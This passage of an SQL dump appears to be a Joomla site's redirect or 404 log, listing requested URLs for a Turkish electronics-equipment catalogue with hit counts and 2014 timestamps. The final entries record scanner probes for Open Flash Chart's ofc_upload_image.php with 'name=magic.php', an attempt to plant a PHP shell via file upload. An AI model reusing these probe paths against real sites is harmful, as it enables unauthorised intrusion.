19:48:07','0000-00-00 00:00:00',301),(5688,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=en','','','',1,0,'2014-09-15 20:32:01','0000-00-00 00:00:00',301),(5689,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137&lang=en','','','',1,0,'2014-09-15 20:49:35','0000-00-00 00:00:00',301),(5690,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=0&lang=en','','','',1,0,'2014-09-15 21:06:53','0000-00-00 00:00:00',301),(5691,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55&lang=tr','','','',1,0,'2014-09-15 21:26:32','0000-00-00 00:00:00',301),(5692,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en&limitstart=10','','','',2,0,'2014-09-15 22:08:35','0000-00-00 00:00:00',301),(5693,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&lang=en&limitstart=5&Itemid=0','','','',1,0,'2014-09-15 22:13:29','0000-00-00 00:00:00',301),(5694,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=tr','','','',1,0,'2014-09-15 23:29:37','0000-00-00 00:00:00',301),(5695,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118&lang=tr','','','',3,0,'2014-09-16 00:11:31','0000-00-00 00:00:00',301),(5696,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92&lang=en','','','',1,0,'2014-09-16 02:05:39','0000-00-00 00:00:00',301),(5697,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr','','','',1,0,'2014-09-16 03:18:45','0000-00-00 00:00:00',301),(5698,'http://www.3s-technologies.com.tr/index.php?option=com_community&view=frontpage&140915-211319','','','',1,0,'2014-09-16 04:13:48','0000-00-00 00:00:00',301),(5699,'http://www.3s-technologies.com.tr/index.php?140915-211319','','','',1,0,'2014-09-16 04:13:49','0000-00-00 00:00:00',301),(5700,'http://www.3s-technologies.com.tr/index.php?option=com_jdownloads&Itemid=101&view=upload&140915-211323','','','',1,0,'2014-09-16 04:13:53','0000-00-00 00:00:00',301),(5701,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_community&view=frontpage&140915-211326','','','',1,0,'2014-09-16 04:13:55','0000-00-00 00:00:00',301),(5702,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?140915-211327','','','',1,0,'2014-09-16 04:13:56','0000-00-00 00:00:00',301),(5703,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_jdownloads&Itemid=101&view=upload&140915-211328','','','',1,0,'2014-09-16 04:13:57','0000-00-00 00:00:00',301),(5704,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143&lang=tr','','','',3,0,'2014-09-16 04:17:07','0000-00-00 00:00:00',301),(5705,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27&lang=en','','','',1,0,'2014-09-16 05:17:22','0000-00-00 00:00:00',301),(5706,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=0&lang=en','','','',1,0,'2014-09-16 05:30:13','0000-00-00 00:00:00',301),(5707,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&Itemid=140&lang=en','','','',2,0,'2014-09-16 05:34:41','0000-00-00 00:00:00',301),(5708,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=en','','','',1,0,'2014-09-16 05:47:51','0000-00-00 00:00:00',301),(5709,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr&limitstart=5','','','',1,0,'2014-09-16 07:33:05','0000-00-00 00:00:00',301),(5710,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108&Itemid=119&lang=en','','','',2,0,'2014-09-16 08:20:05','0000-00-00 00:00:00',301),(5711,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=0&lang=tr','','','',1,0,'2014-09-16 08:35:50','0000-00-00 00:00:00',301),(5712,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137&lang=tr','','','',1,0,'2014-09-16 09:18:27','0000-00-00 00:00:00',301),(5713,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139&Itemid=141&lang=tr','','','',2,0,'2014-09-16 11:15:13','0000-00-00 00:00:00',301),(5714,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=41&Itemid=0&lang=en','','','',1,0,'2014-09-16 11:46:37','0000-00-00 00:00:00',301),(5715,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=&lang=en','','','',1,0,'2014-09-16 12:28:53','0000-00-00 00:00:00',301),(5716,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136&Itemid=138&lang=tr','','','',3,0,'2014-09-16 12:33:02','0000-00-00 00:00:00',301),(5717,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143&lang=en','','','',2,0,'2014-09-16 13:31:27','0000-00-00 00:00:00',301),(5718,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=0&lang=en','','','',1,0,'2014-09-16 13:55:31','0000-00-00 00:00:00',301),(5719,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=en','','','',1,0,'2014-09-16 15:45:57','0000-00-00 00:00:00',301),(5720,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&lang=tr&limitstart=5&Itemid=0','','','',1,0,'2014-09-16 18:05:34','0000-00-00 00:00:00',301),(5721,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114&lang=tr','','','',1,0,'2014-09-16 20:49:18','0000-00-00 00:00:00',301),(5722,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139&lang=tr','','','',2,0,'2014-09-16 21:47:40','0000-00-00 00:00:00',301),(5723,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125&lang=en','','','',2,0,'2014-09-16 22:36:18','0000-00-00 00:00:00',301),(5724,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139&lang=en','','','',2,0,'2014-09-16 23:31:43','0000-00-00 00:00:00',301),(5725,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118&lang=en','','','',2,0,'2014-09-17 02:10:23','0000-00-00 00:00:00',301),(5726,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=0&lang=tr','','','',1,0,'2014-09-17 02:47:23','0000-00-00 00:00:00',301),(5727,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en','','','',1,0,'2014-09-17 05:01:25','0000-00-00 00:00:00',301),(5728,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145&lang=tr','','','',1,0,'2014-09-17 05:01:26','0000-00-00 00:00:00',301),(5729,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120&Itemid=116&lang=tr','','','',2,0,'2014-09-17 05:04:34','0000-00-00 00:00:00',301),(5730,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=94&Itemid=105','','','',2,0,'2014-09-17 06:42:47','0000-00-00 00:00:00',301),(5731,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?id=164&Itemid=160&lang=tr&option=com_content&view=article','','','',4,0,'2014-09-17 08:02:20','0000-00-00 00:00:00',301),(5732,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47&Itemid=0&lang=en','','','',1,0,'2014-09-17 08:49:27','0000-00-00 00:00:00',301),(5733,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=0&lang=en','','','',1,0,'2014-09-17 10:26:29','0000-00-00 00:00:00',301),(5734,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=0&lang=tr','','','',2,0,'2014-09-17 10:37:23','0000-00-00 00:00:00',301),(5735,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=0&lang=en','','','',1,0,'2014-09-17 11:02:56','0000-00-00 00:00:00',301),(5736,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119&Itemid=117&lang=tr','','','',3,0,'2014-09-17 11:20:32','0000-00-00 00:00:00',301),(5737,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123&lang=tr','','','',2,0,'2014-09-17 11:24:25','0000-00-00 00:00:00',301),(5738,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=0&lang=en','','','',1,0,'2014-09-17 11:24:31','0000-00-00 00:00:00',301),(5739,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133&lang=tr','','','',2,0,'2014-09-17 11:26:15','0000-00-00 00:00:00',301),(5740,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160&lang=en','','','',2,0,'2014-09-17 11:28:11','0000-00-00 00:00:00',301),(5741,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144&lang=tr','','','',2,0,'2014-09-17 11:33:57','0000-00-00 00:00:00',301),(5742,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120&Itemid=116&lang=en','','','',2,0,'2014-09-17 11:47:26','0000-00-00 00:00:00',301),(5743,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105&Itemid=112&lang=en','','','',3,0,'2014-09-17 11:51:17','0000-00-00 00:00:00',301),(5744,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=tr','','','',2,0,'2014-09-17 11:55:09','0000-00-00 00:00:00',301),(5745,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=0&lang=tr','','','',1,0,'2014-09-17 11:55:25','0000-00-00 00:00:00',301),(5746,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=tr','','','',4,0,'2014-09-17 12:12:27','0000-00-00 00:00:00',301),(5747,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158&Itemid=159&lang=en','','','',2,0,'2014-09-17 12:18:14','0000-00-00 00:00:00',301),(5748,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156&Itemid=157&lang=en','','','',3,0,'2014-09-17 12:20:09','0000-00-00 00:00:00',301),(5749,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?id=59&Itemid=155&lang=tr&option=com_content&view=category','','','',2,0,'2014-09-17 12:23:12','0000-00-00 00:00:00',301),(5750,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2&lang=tr','','','',1,0,'2014-09-17 12:27:53','0000-00-00 00:00:00',301),(5751,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137','','','',6,0,'2014-09-17 12:29:47','0000-00-00 00:00:00',301),(5752,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default','','','',5,0,'2014-09-17 12:39:24','0000-00-00 00:00:00',301),(5753,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=95&Itemid=106','','','',7,0,'2014-09-17 12:45:12','0000-00-00 00:00:00',301),(5754,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145','','','',2,0,'2014-09-17 12:54:49','0000-00-00 00:00:00',301),(5755,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=tr','','','',2,0,'2014-09-17 13:19:50','0000-00-00 00:00:00',301),(5756,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58&lang=en','','','',2,0,'2014-09-17 13:22:15','0000-00-00 00:00:00',301),(5757,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55&Itemid=1','','','',2,0,'2014-09-17 13:29:28','0000-00-00 00:00:00',301),(5758,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=164&lang=tr','','','',1,0,'2014-09-17 13:32:48','0000-00-00 00:00:00',301),(5759,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167&Itemid=163&lang=tr','','','',2,0,'2014-09-17 13:54:29','0000-00-00 00:00:00',301),(5760,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154&Itemid=156&lang=tr','','','',2,0,'2014-09-17 14:00:16','0000-00-00 00:00:00',301),(5761,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=en','','','',3,0,'2014-09-17 14:06:05','0000-00-00 00:00:00',301),(5762,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=tr','','','',3,0,'2014-09-17 14:23:22','0000-00-00 00:00:00',301),(5763,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?id=42:th-dizgi&Itemid=27&lang=tr&layout=default&option=com_content&view=category','','','',5,0,'2014-09-17 14:41:23','0000-00-00 00:00:00',301),(5764,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&Itemid=152&lang=en','','','',2,0,'2014-09-17 14:58:01','0000-00-00 00:00:00',301),(5765,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=tr','','','',4,0,'2014-09-17 15:00:00','0000-00-00 00:00:00',301),(5766,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130&lang=tr','','','',3,0,'2014-09-17 15:01:56','0000-00-00 00:00:00',301),(5767,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2','','','',2,0,'2014-09-17 15:13:26','0000-00-00 00:00:00',301),(5768,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=0&lang=en','','','',1,0,'2014-09-17 16:31:39','0000-00-00 00:00:00',301),(5769,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152&Itemid=153&lang=en','','','',2,0,'2014-09-17 16:43:08','0000-00-00 00:00:00',301),(5770,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121&Itemid=115&lang=en','','','',2,0,'2014-09-17 16:52:06','0000-00-00 00:00:00',301),(5771,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?catid=41:smd-firin&id=167:lr4&Itemid=163&lang=tr&option=com_content&view=article','','','',4,0,'2014-09-17 17:04:09','0000-00-00 00:00:00',301),(5772,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?catid=60:ikinciel&id=174:rh61&Itemid=164&lang=tr&option=com_content&view=article','','','',4,0,'2014-09-17 17:05:44','0000-00-00 00:00:00',301),(5773,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106&Itemid=113&lang=tr','','','',2,0,'2014-09-17 17:24:34','0000-00-00 00:00:00',301),(5774,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=en','','','',3,0,'2014-09-17 17:39:13','0000-00-00 00:00:00',301),(5775,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=en','','','',2,0,'2014-09-17 17:54:36','0000-00-00 00:00:00',301),(5776,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=97&Itemid=108','','','',2,0,'2014-09-17 18:04:13','0000-00-00 00:00:00',301),(5777,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default','','','',3,0,'2014-09-17 18:15:46','0000-00-00 00:00:00',301),(5778,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=tr','','','',4,0,'2014-09-17 18:43:09','0000-00-00 00:00:00',301),(5779,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131&lang=tr','','','',2,0,'2014-09-17 18:45:04','0000-00-00 00:00:00',301),(5780,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102&lang=tr','','','',1,0,'2014-09-17 18:46:25','0000-00-00 00:00:00',301),(5781,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105&Itemid=112&lang=tr','','','',2,0,'2014-09-17 18:47:00','0000-00-00 00:00:00',301),(5782,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=en','','','',3,0,'2014-09-17 19:45:06','0000-00-00 00:00:00',301),(5783,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=en','','','',2,0,'2014-09-17 19:48:57','0000-00-00 00:00:00',301),(5784,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134&lang=en','','','',2,0,'2014-09-17 19:50:53','0000-00-00 00:00:00',301),(5785,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=tr','','','',2,0,'2014-09-17 19:52:48','0000-00-00 00:00:00',301),(5786,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154&lang=tr','','','',2,0,'2014-09-17 19:56:39','0000-00-00 00:00:00',301),(5787,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=en','','','',2,0,'2014-09-17 19:58:34','0000-00-00 00:00:00',301),(5788,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default','','','',2,0,'2014-09-17 20:00:30','0000-00-00 00:00:00',301),(5789,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=tr','','','',3,0,'2014-09-17 20:06:17','0000-00-00 00:00:00',301),(5790,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en&limitstart=10','','','',4,0,'2014-09-17 20:47:07','0000-00-00 00:00:00',301),(5791,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=en','','','',2,0,'2014-09-17 20:54:43','0000-00-00 00:00:00',301),(5792,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115&Itemid=126&lang=tr','','','',2,0,'2014-09-17 21:06:16','0000-00-00 00:00:00',301),(5793,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106&Itemid=113&lang=en','','','',2,0,'2014-09-17 21:10:07','0000-00-00 00:00:00',301),(5794,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=tr','','','',2,0,'2014-09-17 21:12:03','0000-00-00 00:00:00',301),(5795,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158','','','',4,0,'2014-09-17 22:41:08','0000-00-00 00:00:00',301),(5796,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=tr','','','',1,0,'2014-09-18 00:02:46','0000-00-00 00:00:00',301),(5797,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=tr','','','',2,0,'2014-09-18 01:36:08','0000-00-00 00:00:00',301),(5798,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=0&lang=en','','','',1,0,'2014-09-18 02:22:17','0000-00-00 00:00:00',301),(5799,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167&Itemid=163','','','',3,0,'2014-09-18 02:54:48','0000-00-00 00:00:00',301),(5800,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47&Itemid=0&lang=tr','','','',1,0,'2014-09-18 03:06:48','0000-00-00 00:00:00',301),(5801,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=58%3Adusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=tr','','','',1,0,'2014-09-18 03:33:18','0000-00-00 00:00:00',301),(5802,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr&limitstart=10','','','',1,0,'2014-09-18 03:53:12','0000-00-00 00:00:00',301),(5803,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89&Itemid=101','','','',1,0,'2014-09-18 04:38:47','0000-00-00 00:00:00',301),(5804,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&lang=en','','','',1,0,'2014-09-18 05:00:11','0000-00-00 00:00:00',301),(5805,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=0&lang=tr','','','',1,0,'2014-09-18 11:47:33','0000-00-00 00:00:00',301),(5806,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=en','','','',2,0,'2014-09-18 16:25:49','0000-00-00 00:00:00',301),(5807,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=en','','','',1,0,'2014-09-18 19:05:47','0000-00-00 00:00:00',301),(5808,'http://3s-technologies.com.tr/index.php/en/homepage2/81-english-uk/','','','',11,0,'2014-09-19 06:33:15','0000-00-00 00:00:00',301),(5809,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr&limitstart=5','','http://ledbazaar.org/','',2,0,'2014-09-19 23:19:28','0000-00-00 00:00:00',301),(5810,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73&Itemid=82&lang=tr','','','',2,0,'2014-09-20 01:21:58','0000-00-00 00:00:00',301),(5811,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158','','','',1,0,'2014-09-20 15:32:07','0000-00-00 00:00:00',301),(5812,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-09-21 06:00:38','0000-00-00 00:00:00',301),(5813,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-09-21 06:00:38','0000-00-00 00:00:00',301),(5814,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-09-21 06:00:39','0000-00-00 00:00:00',301),(5815,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-09-21 06:00:39','0000-00-00 00:00:00',301),(5816,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-09-21 06:00:39','0000-00-00 00:00:00',301),(5817,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-09-21 06:00:40','0000-00-00 00:00:00',301),(5818,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-09-21 06:00:40','0000-00-00 00:00:00',301),(5819,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-09-21 06:00:40','0000-00-00 00:00:00',301),(5820,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-09-21 06:00:41','0000-00-00 00:00:00',301),(5821,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-09-21 06:00:41','0000-00-00 00:00:00',301),(5822,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-09-21 06:00:41','0000-00-00 00:00:00',301),(5823,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-09-21 06:00:41','0000-00-00 00:00:00',301),(5824,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-09-21 06:00:42','0000-00-00 00:00:00',301),(5825,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-09-21 06:00:42','0000-00-00 